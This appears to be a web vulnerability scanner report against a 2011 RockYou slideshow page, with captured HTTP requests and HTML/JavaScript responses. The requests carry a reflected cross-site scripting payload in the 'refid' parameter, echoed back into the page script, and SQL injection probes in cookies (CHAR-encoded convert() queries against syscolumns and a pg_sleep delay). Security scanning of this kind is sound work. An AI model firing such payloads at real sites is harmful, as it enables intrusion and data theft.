frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid=3&create='%22%3E%3Cnet%20sparker=netsparker(0x0025BE)%3E&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On..
Date: Mon, 18 Apr 2011 22:40:27 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:40:26 GMT; path=/; domain=.rockyou.com,lastlogin=1303166427; expires=Wed, 27-Jul-2011 22:40:27 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:40:27 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:40:27 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:40:27 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=28768 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26934
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="create-slideshow-js-combined.php?ver=2" type="text/javascript"></script><script src="/js/greybox/jquery-latest.js" type="text/javascript"></script><script src="/js/greybox/greybox.js?2" type="text/javascript"></script><script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/create-slideshow-combined.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/../js/greybox/greybox.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class="background_normal"
style=""
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload="initDND();"
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="height:5px;padding:0px;margin:0px;overflow:hidden"></div>
<script language="javascript" type="text/javascript" src="/js/flash_file_uploader.js"></script><script language="javascript" type="text/javascript" src="/js/iuembed.js"></script><script type="text/javascript">// Suppress multifile uploadervar suppressMulti = false;// variable needed for grey box modal dialog for the 'More Songs' linkvar GB_ANIMATION = true; // we have a variable in create.js that needs to know about the right translation for a text.var lang_upload_confirm_delete_slide = "Do you really want to delete this slide?";var lang_slideshow_aspect_43_only = "Only 4:3 Available";var lang_slideshow_aspect_43 = "TV (4:3)";var lang_slideshow_aspect_21 = "Wide (2:1)";var lang_slideshow_aspect_31 = "Strip (3:1)";var lang_empty_caption = "[Click to Add a Caption]";var lang_remove_all_captions = "Are you sure you want to remove all captions?";var lang_abandon_slideshow = "Abandon this slideshow and START OVER?";var evalThis;var thisinstanceid = '3';var tagListArray; var xmlreqs = true; //Disable / enable xmlrequestsvar xmlBatchReq = ""; //Batch Stringvar playingSong = 0; //Current Song that is playingvar storedSongList = ""; //List of Songs responde from AJAXvar statusAddingSong = false;var mycustomtabs = new Array("cattags","transitions","themes","skins","backgrounds", "music","privacy","size","caption","min");var openWithCreateMode = 0;var sizeLevel = 3;var pitchLearnMoreBeboBands = 1; var slideCount = 0;var beforeUnloadStatus = 0;var beforeUnloadStatusEnabled = 1;var bgColorManualSet = 0;var ghost_popup = new Ghost_Popup('ghost_popup');var ghost_popup_music = new Ghost_Popup('ghost_popup_music');var source = "";var currentSkin = '';var currentTransition = '';var currentBackground = '';var currentTheme = '';var currentRatio = 0;var skinConfig = 1;var removePreviewSlide = 0;var slideShowCount="0";//var slideShowCount="0";embed = new appEmbed(thisinstanceid);membed = new musicEmbed(thisinstanceid);embed.setLocal(true);embed.noSound=true;embed.noShare=true;function confirmAbandon() { if (openWithCreateMode == 1 && slideCount > 0 && beforeUnloadStatus == 1) { event.returnValue = "If you continue, this slideshow will be abandoned!"; } beforeUnloadStatus = beforeUnloadStatusEnabled;}function initDND() { document.getElementById('loadingsection_container').className = 'background_normal'; // for partner sites, switch to smaller logo var partner_logo_big = document.getElementById("partner_logo_big"); var partner_logo_small = document.getElementById("partner_logo_small"); if (partner_logo_big) partner_logo_big.style.display = "none"; if (partner_logo_small) partner_logo_small.style.display = "block"; var rockyou_logo = document.getElementById("logo"); if (rockyou_logo) rockyou_logo.style.display = "block"; setupFileUploader(); printCountrySelect(document.getElementById("countryselect")); document.getElementById('loadingsection').innerHTML = ''; document.getElementById('loadingsection').style.display = 'none'; document.getElementById('ticker_area').style.display=""; document.getElementById('upload-and-customize').style.display=""; var bannerheading = document.getElementById('bannerheading'); if (bannerheading) bannerheading.style.display=""; initSections();}function initSectionsNew(){ supermaxUL(); //document.getElementById('toptab-container').style.display=""; document.getElementById('uploadsection').style.display=""; showUploadDiv(); hasInstanceIDEmbed(); simple_ajax_call('email/ajax_email_tracking.php?message=3&widget=slideshow&instanceid=0', false); openWithCreateMode = 1; document.getElementById("bebo_bubble").style.display = "block";}function initSections(){ if (openWithCreateMode == 1) { // randomize transition updateTransition("photostack2"); } document.getElementById('arrange-and-caption').style.display=""; document.getElementById('quickstyles').style.display=""; document.getElementById('div-upload').style.display=""; document.getElementById('tab-customize').style.display=""; document.getElementById('div-arrange').style.display=""; embed.isScale = false;currentSkin = ''; currentTransition = 'photostack'; currentRatio = 1; skinConfig = 1; currentTheme = ''; currentBackground = ''; setAspectRatioControls(); setBackgroundControls(); setSkinControls(); setSizeControls(); showCookieUploadTab(); showCustomizeDiv(); regUL(); var slidelist = []; slidePrint(slidelist); refreshSlideShow(); refreshMusic(0); //Tags tagListArray = ["","mokina"]; tagList(tagListArray); setPeopleMap('','','',''); //Songs songListArray = []; songList(songListArray); if (openWithCreateMode == 1) { simple_ajax_call('email/ajax_email_tracking.php?message=4&widget=slideshow&instanceid='+thisinstanceid, false); Set_Cookie('last_created_slideshow', thisinstanceid, 1); } else { if (thisinstanceid != parseInt(Get_Cookie('last_created_slideshow'))) { Set_Cookie('last_created_slideshow', 0, 1); } } // change the instruction var multi_uploader_instruction = document.getElementById("multi_uploader_instruction"); if (multi_uploader_instruction) { multi_uploader_instruction.innerHTML = '<p style="font-size:16px;font-weight:bold;margin-bottom:10px;">Next steps</p>' + '<ul style="font-size:13px;margin-left:10px;">' + '<li>Add more slides</li>' + '<li>To edit captions, scroll down</li>' + '<li>To move and delete slides, scroll down</li>' + '<li>Try the customization options to the right</li>' + '<li>Click Save when you\'re done</li>' + '</ul>' + '<p style="font-size:15px;margin-top:15px;">If you\'re having trouble uploading, <a target="_blank" href="/contact.php" style="text-decoration:underline">let us know</a>.</p>'; } if (Get_Cookie('bubble_html_file_upload_edit_hide') == null) { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_bottom'; } } else { if (document.getElementById("html_file_upload_instruction_container2")) { document.getElementById("html_file_upload_instruction_container2").className = 'html_file_uploader_hidden'; } } document.getElementById("bebo_bubble").style.display = "none"; if (Get_Cookie('bubble_save_hide') == null) { document.getElementById("bubble_save1").style.display = "block"; } else { document.getElementById("bubble_save1").style.display = "none"; } //Colors loadSV(); updateH('F1FFCC'); if (window.attachEvent) { window.attachEvent("onbeforeunload", confirmAbandon); } balance_tabs_reset(); setTimeout("balance_tabs_set();", 1000);}function hasInstanceIDEmbed(){ var loc = window.location.href; var instanceString = loc.match("#instanceid=([0-9]*)"); if (instanceString != null) { if (parseInt(instanceString[1]) > 0) window.location='slideshow-create.php?refid=3&create='%22%3E%3Cnet%20sparker=netsparker(0x0025BE)%3E&instanceid=3&create=1&instanceid='+instanceString[1]; }}// Flash uploader calls this function when the user has chosen image(s) to upload and on initfunction beginFlashUpload() { var initObj = {}; initObj.instanceid = thisinstanceid; initObj.infront = (document.getElementById('uploadplace').infront.checked) ? true : false; initObj.dataHost = 'http://www.rockyou.com/addimage.php?type=file_html&userid=-1'; return initObj;}// Called on return of flash uploaderfunction flashUploadComplete(instanceid, errorcode, errormessage) { urchinTracker('/flashuploader/complete'); if (instanceid != "" && thisinstanceid == "") //On Create New Show. Get the New Instanceid and initiate UI { embed = new appEmbed(instanceid); membed = new musicEmbed(instanceid); embed.setLocal(true); embed.noSound=true; embed.noShare=true; //Reload page with slideshow var location = window.location.href; if (location.indexOf('?') != -1) location += "&instanceid="+instanceid; else location += "?instanceid="+instanceid; window.location = location; } else { if (parseInt(errorcode) > 0) { document.getElementById('ulerror').style.display=''; document.getElementById('ulerror').innerHTML=errorcode + " - " + errormessage; } else { document.getElementById('ulerror').innerHTML=""; document.getElementById('ulerror').style.display='none'; refreshList(); clearCaptions(); clearEntry(); } if (removePreviewSlide == 1) { setTimeout('xmlhttpPost("remove_preview_slide", 1);', 1000); removePreviewSlide = 0; } }}function uploadComplete(errorcode, errormessage, url, instanceid){ if (parseInt(errorcode) > 0) { ghost_popup.show("photo upload failed", 13, 10, 60, 100, 1, "frm"); } else { ghost_popup.show("photo uploaded", 13, 10, 60, 100, 1, "frm"); } var form2 = document.getElementById("form2"); if (form2) { form2.reset(); } hideUploading(); clearInterval(progressInterval); if (instanceid != "" && thisinstanceid == "") //On..
|
- /slideshow-create.php
/slideshow-create.php |
http://www.rockyou.com/slideshow-create.php?lang=en&refid='%22%3E%3Cnet%20sparker=alert(0x0025DA)%3E
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| refid | GET | '"><net sparker=alert(0x0025DA)> |
Request
GET /slideshow-create.php?lang=en&refid='%22%3E%3Cnet%20sparker=netsparker(0x0025DA)%3E HTTP/1.1
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166652; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/slideshow-create.php?refid=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303166652; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=facebook.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:44:12 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:44:11 GMT; path=/; domain=.rockyou.com,lang=en; expires=Thu, 28-Apr-2011 22:44:12 GMT; path=/; domain=.rockyou.com,lastlogin=1303166652; expires=Wed, 27-Jul-2011 22:44:12 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 22:44:12 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 22:44:12 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 22:44:12 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=23658 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26899
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
